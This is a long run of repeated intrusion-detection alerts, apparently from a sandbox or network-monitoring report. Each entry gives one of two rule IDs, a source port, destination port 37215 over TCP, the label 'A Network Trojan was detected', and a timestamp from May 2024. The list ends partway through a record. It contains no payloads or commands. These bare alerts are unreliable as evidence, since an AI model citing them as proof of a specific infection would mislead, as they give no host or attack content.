            SID:2829579
            Source Port:46114
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.755726
            SID:2835222
            Source Port:58562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.532894
            SID:2829579
            Source Port:55376
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.871487
            SID:2829579
            Source Port:58882
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.807300
            SID:2829579
            Source Port:57322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.525647
            SID:2829579
            Source Port:52256
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.732703
            SID:2829579
            Source Port:40824
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.806561
            SID:2835222
            Source Port:34516
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.774646
            SID:2835222
            Source Port:54326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.067505
            SID:2835222
            Source Port:35288
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:25.154968
            SID:2829579
            Source Port:40096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.842060
            SID:2829579
            Source Port:59250
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.910091
            SID:2829579
            Source Port:37422
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.809200
            SID:2835222
            Source Port:52786
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.925558
            SID:2835222
            Source Port:43002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.812112
            SID:2835222
            Source Port:43762
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.906027
            SID:2835222
            Source Port:51626
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.033222
            SID:2829579
            Source Port:42120
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.861567
            SID:2835222
            Source Port:55834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.884608
            SID:2835222
            Source Port:55158
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.837496
            SID:2835222
            Source Port:53692
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.771011
            SID:2829579
            Source Port:36172
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857226
            SID:2829579
            Source Port:52112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.038106
            SID:2829579
            Source Port:35630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.298301
            SID:2829579
            Source Port:46860
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.759870
            SID:2829579
            Source Port:41018
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.917367
            SID:2829579
            Source Port:49756
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.222018
            SID:2829579
            Source Port:49402
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.623449
            SID:2835222
            Source Port:50600
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.814626
            SID:2835222
            Source Port:48004
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.782570
            SID:2835222
            Source Port:56242
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.348836
            SID:2835222
            Source Port:39486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.045809
            SID:2835222
            Source Port:48480
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.837897
            SID:2829579
            Source Port:50322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.874282
            SID:2835222
            Source Port:59228
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.810549
            SID:2835222
            Source Port:53956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.764592
            SID:2835222
            Source Port:33016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.745135
            SID:2829579
            Source Port:33100
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.789207
            SID:2835222
            Source Port:46174
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.839589
            SID:2835222
            Source Port:52530
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.943591
            SID:2829579
            Source Port:52612
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.289341
            SID:2835222
            Source Port:60802
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862291
            SID:2829579
            Source Port:40976
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.716262
            SID:2829579
            Source Port:59588
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.047984
            SID:2829579
            Source Port:57938
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.559901
            SID:2835222
            Source Port:46936
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.357738
            SID:2829579
            Source Port:42008
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.276403
            SID:2829579
            Source Port:33078
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.811406
            SID:2835222
            Source Port:59104
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.071313
            SID:2835222
            Source Port:48744
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.544000
            SID:2835222
            Source Port:42132
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.312802
            SID:2835222
            Source Port:35204
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.532779
            SID:2835222
            Source Port:33818
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.852925
            SID:2835222
            Source Port:57892
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.516596
            SID:2829579
            Source Port:49102
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:34.409451
            SID:2829579
            Source Port:60886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.560079
            SID:2835222
            Source Port:33062
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.559135
            SID:2829579
            Source Port:38426
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.809765
            SID:2835222
            Source Port:58790
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.669991
            SID:2829579
            Source Port:35446
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.675303
            SID:2829579
            Source Port:54506
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.260980
            SID:2835222
            Source Port:57454
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.730369
            SID:2835222
            Source Port:50510
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.823362
            SID:2829579
            Source Port:44816
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.765782
            SID:2829579
            Source Port:40836
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.766197
            SID:2829579
            Source Port:52908
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.842163
            SID:2835222
            Source Port:41516
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.734685
            SID:2829579
            Source Port:53748
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.343533
            SID:2829579
            Source Port:38064
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.568195
            SID:2829579
            Source Port:38690
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.819737
            SID:2835222
            Source Port:59032
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.955705
            SID:2829579
            Source Port:50496
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.909236
            SID:2829579
            Source Port:60710
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.843069
            SID:2829579
            Source Port:54584
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.377101
            SID:2835222
            Source Port:38928
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809728
            SID:2829579
            Source Port:38162
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.307515
            SID:2829579
            Source Port:52558
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.300092
            SID:2829579
            Source Port:47114
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.710051
            SID:2835222
            Source Port:60376
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.843856
            SID:2829579
            Source Port:37382
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.741944
            SID:2829579
            Source Port:49206
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.730593
            SID:2829579
            Source Port:55800
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.333241
            SID:2829579
            Source Port:52888
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.847838
            SID:2835222
            Source Port:58684
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.762500
            SID:2835222
            Source Port:57916
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.706756
            SID:2835222
            Source Port:36202
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.988618
            SID:2829579
            Source Port:43546
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.084599
            SID:2829579
            Source Port:37630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919411
            SID:2829579
            Source Port:36336
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.541388
            SID:2829579
            Source Port:52806
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.812055
            SID:2835222
            Source Port:48250
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.879678
            SID:2829579
            Source Port:57140
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.042951
            SID:2835222
            Source Port:48182
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.048164
            SID:2829579
            Source Port:37538
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.852250
            SID:2829579
            Source Port:45458
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.716788
            SID:2829579
            Source Port:58736
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767013
            SID:2829579
            Source Port:33476
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.748679
            SID:2829579
            Source Port:38296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.993250
            SID:2829579
            Source Port:47184
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.961311
            SID:2835222
            Source Port:50012
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.040642
            SID:2835222
            Source Port:60996
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.707112
            SID:2829579
            Source Port:39858
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.916493
            SID:2829579
            Source Port:35330
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.061123
            SID:2835222
            Source Port:34904
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.542690
            SID:2829579
            Source Port:40556
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:55.658801
            SID:2829579
            Source Port:53502
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.811479
            SID:2829579
            Source Port:39618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.885154
            SID:2829579
            Source Port:48780
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.957993
            SID:2835222
            Source Port:39394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.866114
            SID:2835222
            Source Port:48298
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.069979
            SID:2835222
            Source Port:34222
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.251819
            SID:2835222
            Source Port:45632
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.966729
            SID:2835222
            Source Port:49544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.045494
            SID:2835222
            Source Port:49474
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.697401
            SID:2835222
            Source Port:59338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.836935
            SID:2829579
            Source Port:35596
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:48.616931
            SID:2829579
            Source Port:42100
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.855516
            SID:2835222
            Source Port:59972
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.060147
            SID:2829579
            Source Port:53618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.547131
            SID:2835222
            Source Port:36734
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.575076
            SID:2835222
            Source Port:51020
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.762386
            SID:2829579
            Source Port:34742
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.739481
            SID:2829579
            Source Port:44882
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.929518
            SID:2829579
            Source Port:39810
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.567871
            SID:2835222
            Source Port:59008
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.713215
            SID:2835222
            Source Port:57486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.860549
            SID:2835222
            Source Port:50250
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.780652
            SID:2835222
            Source Port:40228
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.611465
            SID:2829579
            Source Port:57270
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.739101
            SID:2835222
            Source Port:54520
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.732859
            SID:2835222
            Source Port:34766
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.312018
            SID:2829579
            Source Port:37680
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:44.565676
            SID:2835222
            Source Port:45216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.334755
            SID:2835222
            Source Port:52648
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.374885
            SID:2835222
            Source Port:43560
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.572160
            SID:2829579
            Source Port:39142
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.720730
            SID:2835222
            Source Port:51112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.035578
            SID:2829579
            Source Port:34408
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.882601
            SID:2829579
            Source Port:39108
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.922748
            SID:2829579
            Source Port:50382
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.675566
            SID:2835222
            Source Port:54430
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.289598
            SID:2829579
            Source Port:52932
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.929869
            SID:2829579
            Source Port:57456
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.341952
            SID:2829579
            Source Port:57806
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.946657
            SID:2829579
            Source Port:44452
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:55.685683
            SID:2835222
            Source Port:59534
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.012324
            SID:2829579
            Source Port:43308
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.506264
            SID:2835222
            Source Port:60502
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.559262
            SID:2835222
            Source Port:45028
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:17.005860
            SID:2835222
            Source Port:59506
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.153215
            SID:2835222
            Source Port:44824
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.773607
            SID:2835222
            Source Port:39190
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.423054
            SID:2835222
            Source Port:60732
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.018799
            SID:2829579
            Source Port:32878
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.883669
            SID:2835222
            Source Port:51922
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.883371
            SID:2835222
            Source Port:40536
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869710
            SID:2835222
            Source Port:55614
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767298
            SID:2835222
            Source Port:33458
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.040333
            SID:2835222
            Source Port:38576
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.185406
            SID:2835222
            Source Port:38392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.753422
            SID:2835222
            Source Port:55662
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.735733
            SID:2835222
            Source Port:39134
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857206
            SID:2829579
            Source Port:35930
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.251335
            SID:2835222
            Source Port:56036
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.871068
            SID:2835222
            Source Port:60104
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.740860
            SID:2829579
            Source Port:53970
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.887555
            SID:2829579
            Source Port:48068
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.988660
            SID:2835222
            Source Port:40912
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.987528
            SID:2835222
            Source Port:42444
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.887386
            SID:2835222
            Source Port:46342
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.058995
            SID:2835222
            Source Port:42250
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.466285
            SID:2835222
            Source Port:55572
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.500143
            SID:2829579
            Source Port:44644
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.068434
            SID:2829579
            Source Port:38262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.327230
            SID:2829579
            Source Port:51004
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.375914
            SID:2835222
            Source Port:34272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.948400
            SID:2829579
            Source Port:43452
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.380427
            SID:2835222
            Source Port:41186
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.737361
            SID:2835222
            Source Port:39886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.972336
            SID:2829579
            Source Port:53476
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.559732
            SID:2835222
            Source Port:36666
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.810157
            SID:2829579
            Source Port:39786
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.776903
            SID:2835222
            Source Port:38260
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.059866
            SID:2829579
            Source Port:45160
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.806379
            SID:2835222
            Source Port:57122
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507621
            SID:2829579
            Source Port:52792
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.775582
            SID:2829579
            Source Port:54002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.076719
            SID:2829579
            Source Port:40614
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.071090
            SID:2835222
            Source Port:52492
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.924219
            SID:2829579
            Source Port:34534
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.326785
            SID:2835222
            Source Port:51884
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.925010
            SID:2829579
            Source Port:40228
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.860506
            SID:2829579
            Source Port:47954
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.366873
            SID:2829579
            Source Port:44128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994849
            SID:2835222
            Source Port:47890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.277497
            SID:2829579
            Source Port:39250
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.542032
            SID:2829579
            Source Port:41662
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.804450
            SID:2829579
            Source Port:47268
            Destination Port:37215
